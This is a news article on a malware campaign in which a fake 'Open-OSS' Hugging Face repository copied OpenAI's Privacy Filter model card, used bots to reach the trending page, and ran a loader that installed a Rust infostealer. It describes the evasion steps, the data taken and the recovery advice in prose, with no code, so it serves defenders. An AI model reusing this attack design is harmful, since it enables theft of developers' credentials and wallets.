Fake OpenAI Repo Hit #1 on Hugging Face—And Stole Passwords While It Trended

OpenAI released Privacy Filter in late April—a small, open-weight model built to detect and automatically redact personally identifiable information from text. It landed on Hugging Face under an Apache 2.0 license and quickly attracted developer interest. Someone noticed.

Within days, a fake account named “Open-OSS” published a near-identical repository called privacy-filter. The model card was copied word for word from OpenAI’s. The only difference in the “readme” file: instructions to clone the repo and run a file called start.bat on Windows, or loader.py on Linux and Mac.

Within 18 hours, the fake repo hit #1 on Hugging Face’s trending page—racking up approximately 244,000 downloads and 667 likes. HiddenLayer, the AI security firm that flagged the campaign, found that 657 of those 667 likes came from accounts matching predictable auto-generated bot-naming patterns.

The download numbers were almost certainly inflated the same way. Manufactured social proof to make the bait look real.

How the malware actually worked

The malware basically worked like a poisoned pill wrapped in a very convincing candy coating. The loader.py script opens with fake model training output—progress bars, synthetic datasets, dummy class names—designed to look like a real AI loader is running.

Under the hood, it quietly disables security checks, pulls an encoded command from a public JSON paste site (a smart trick: no need to update the repository when the payload changes), and passes that command to PowerShell running completely hidden in the background. Windows users see nothing.

That command downloads a second script from a domain mimicking a blockchain analytics API. That script downloads the actual malware—a custom-built infostealer written in Rust—adds it to Windows Defender’s exclusions list, then launches it at SYSTEM-level privileges via a scheduled task that immediately deletes itself after firing. The whole chain runs and cleans up after itself, leaving almost no trace.

The final payload is thorough. It grabs everything stored in Chrome and Firefox—saved passwords, session cookies, browser history, encryption keys, everything. It targets Discord accounts, cryptocurrency wallet seed phrases, SSH keys, FTP credentials, and takes screenshots across all monitors. Then it packages everything as a compressed JSON bundle and ships it to attacker-controlled servers.

There’s no need for us to tell you what the hackers can do with all that information later.

The malware also checks whether it’s running in a virtual machine or a security sandbox, and quits quietly if it detects one. It’s designed to run once on real targets, steal everything, and disappear.

Why this is bigger than just one repo

This isn’t an isolated incident. It’s part of a pattern. HiddenLayer identified six additional repositories under a separate Hugging Face account named “anthfu,” uploaded in late April, using the exact same malicious loader pointing to the exact same command server. Those repos impersonated models like Qwen3, DeepSeek, and Bonsai to lure AI developers.

The infrastructure itself—a domain called api.eth-fastscan.org—was also observed hosting a separate malware sample that beacons to a command server. HiddenLayer believes the connection between the two campaigns is “possibly linked” and cautions that shared infrastructure alone doesn’t confirm a single operator.

This is what a supply chain attack against the AI developer community looks like. The attacker doesn’t break into OpenAI or Hugging Face. They just publish a convincing lookalike, game the trending algorithm with bots, and wait for developers to do the rest. A similar playbook hit the Lottie Player JavaScript library in 2024, costing one user 10 Bitcoin (worth over $700,000 at the time).

What if you downloaded it?

If you cloned Open-OSS/privacy-filter on a Windows machine and ran any file from it, you should treat the device as fully compromised. Don’t log into anything from that machine before wiping it.

After that, change all the credentials that were stored in your browser—passwords, session cookies, OAuth tokens. Move any crypto funds to a new wallet generated on a clean device ASAP and assume seed phrases were stolen.

Since it also gets your Discord information, and that service is heavily automated, you should invalidate your Discord sessions and reset that password. Any SSH keys or FTP credentials on that machine should be considered burned.

The repository is now removed. Huggingface has not disclosed what, if any, additional screening measures it plans to implement for trending repositories.

As of now, seven confirmed malicious repositories from this campaign have been identified. How many more exist—or existed before being detected—remains unknown.